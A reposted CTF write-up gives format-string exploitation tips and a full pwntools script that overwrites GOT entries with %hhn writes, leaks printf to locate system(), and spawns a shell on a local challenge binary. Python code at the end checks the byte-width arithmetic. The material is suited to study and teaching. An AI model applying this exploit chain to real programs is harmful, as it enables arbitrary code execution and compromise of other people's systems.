Format string vulnerability tips

Source: Internet  Editor: 程序博客网  Date: 2024/05/18 17:04

A short summary written after finishing a CTF.

1. If the exploit cannot be finished in a single pass, overwrite a GOT entry so that control returns to the start of the program.

2. Use %hhn wherever possible to reduce the amount of output; otherwise receiving the output becomes a problem.

3. If the offset of the string is hard to calculate, pad with 'a' characters to align it.


from pwn import *

# GOT entries of exit and printf in the challenge binary.
exit_got = 0x0804a024
#0804866b
print_got = 0x0804a014
# Scratch values left over from the write-up; the script does not use z1/z2.
z1 = 0x0804
z1 -= 8
z2 = 0x866d
z2 -= 0x0804
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
p = process('./pwn1')
#gdb.attach(p)
print(p.recvuntil(b'Welcome~\n'))

# Round 1: four %hhn writes replace the exit GOT entry with the address of the
# program start (tip 1), so the binary runs again instead of exiting.
# Each %<width>d raises printf's character count to the next byte value;
# %32$..%35$ are the stack positions of the four addresses appended below.
payload = '%{0}d%32$hhn%{1}d%33$hhn%{2}d%34$hhn%{3}d%35$hhn'.format(
    (0x6E) % 0x100, (0x186 - 0x6e) % 0x100, (0x104 - 0x86) % 0x100, (0x108 - 0x4))
# Pad with 'a' to a fixed length so the addresses land at known offsets (tip 3).
payload = payload.encode() + b'a' * (100 - len(payload))
payload += p32(exit_got) + p32(exit_got + 1) + p32(exit_got + 2) + p32(exit_got + 3)
p.sendline(payload)
print(p.recvuntil(b"\n"))

# Round 2: leak the resolved printf address through its GOT entry
# (the address placed at the start of the buffer is stack argument 7).
payload = p32(print_got) + b"%7$s"
p.sendline(payload)
p.recv(4)                      # skip the echoed address bytes
printf_addr = u32(p.recv(4))
print("%x" % printf_addr)

# Compute system() from the leaked printf address and the libc symbol offsets,
# then split it into its four bytes (little-endian).
system_addr = printf_addr - libc.symbols['printf'] + libc.symbols['system']
syslow1 = system_addr % 0x100
syslow2 = (system_addr // 0x100) % 0x100
syslow3 = (system_addr // 0x10000) % 0x100
syslow4 = (system_addr // 0x1000000) % 0x100

# Round 3: overwrite the printf GOT entry with system() byte by byte; each
# width is the distance from the previous byte value modulo 0x100 (tip 2).
payload = '%{0}d%32$hhn%{1}d%33$hhn%{2}d%34$hhn%{3}d%35$hhn'.format(
    syslow1, (0x100 + syslow2 - syslow1) % 0x100,
    (0x100 + syslow3 - syslow2) % 0x100, (0x100 + syslow4 - syslow3) % 0x100)
payload = payload.encode() + b'a' * (100 - len(payload))
payload += p32(print_got) + p32(print_got + 1) + p32(print_got + 2) + p32(print_got + 3)
p.sendline(payload)
p.sendline(b"/bin/sh\x00")
p.interactive()
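The byte-splitting arithmetic behind the %hhn payloads above can be checked offline before anything is sent to a process. The following is an added example, not code from the original write-up: a pure-Python model of what a chain of "%<width>d%<k>$hhn" pieces leaves in memory, plus a generalized width calculator. The function names (hhn_widths, simulate_hhn_writes) and the sample argument values are assumptions for illustration. It reproduces the value that the first payload's widths store, and it models the two ways the count can drift that tips 2 and 3 are working around: a width of 0 (which printf reads as a flag, not a width) and a printed argument that has more digits than its width.

```python
# Added example (not part of the original write-up): a model of printf's
# side effects for "%<width>d%<k>$hhn" chains, used to check the arithmetic
# in the script above without a binary or a process.  Names and sample
# values are assumptions for illustration.

def hhn_widths(target, start_count=0):
    """Return the four %d widths that make successive %hhn writes store the
    little-endian bytes of the 32-bit value `target`, given that printf has
    already emitted `start_count` characters.  Each width is kept in 1..256:
    a width of 0 would turn "%0d" into a flag and still print one character,
    throwing the running count off by one."""
    widths = []
    written = start_count
    for shift in (0, 8, 16, 24):
        wanted = (target >> shift) & 0xFF
        step = (wanted - written) % 0x100
        if step == 0:
            step = 0x100  # wrap a full byte instead of emitting "%0d"
        widths.append(step)
        written += step
    return widths


def simulate_hhn_writes(widths, args, start_count=0):
    """Model the running character count of printf for "%{w}d%k$hhn" pairs.
    `args` are the integers each %d actually prints; if a value needs more
    digits than its width, printf prints the longer form and the count
    drifts, which corrupts every byte written from then on.
    Returns (value stored by the four %hhn writes, total characters printed)."""
    count = start_count
    stored = 0
    for i, (w, a) in enumerate(zip(widths, args)):
        count += max(w, len(str(a)))        # %wd pads to at least w chars
        stored |= (count & 0xFF) << (8 * i)  # %hhn stores the low byte only
    return stored, count


if __name__ == "__main__":
    # Widths from the first payload in the script above; arguments of 0 are
    # a constructed stand-in for whatever the %d conversions read.
    page_widths = [0x6e, 0x186 - 0x6e, 0x104 - 0x86, 0x108 - 0x4]
    value, total = simulate_hhn_writes(page_widths, [0, 0, 0, 0])
    print("first payload stores 0x%08x after %d characters" % (value, total))
    print("minimal widths for the same value:",
          [hex(w) for w in hhn_widths(value)])
    # A printed argument wider than its field shifts the last byte.
    drifted, _ = simulate_hhn_writes(hhn_widths(value), [0, 0, 0, 12345])
    print("with a 5-digit argument in the last slot: 0x%08x" % drifted)
```

For comparison, storing the same 32-bit value with a single %n would require printf to emit 0x0804866e (about 134 million) characters, which is why the write-up splits the value into four %hhn writes and why the total stays in the hundreds of bytes. The drift case is the reason for the fixed-length 'a' padding in tip 3: once the offsets and widths are fixed, any change in what the %d conversions print shows up as a wrong byte, and the model above lets that be spotted before the payload is sent.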

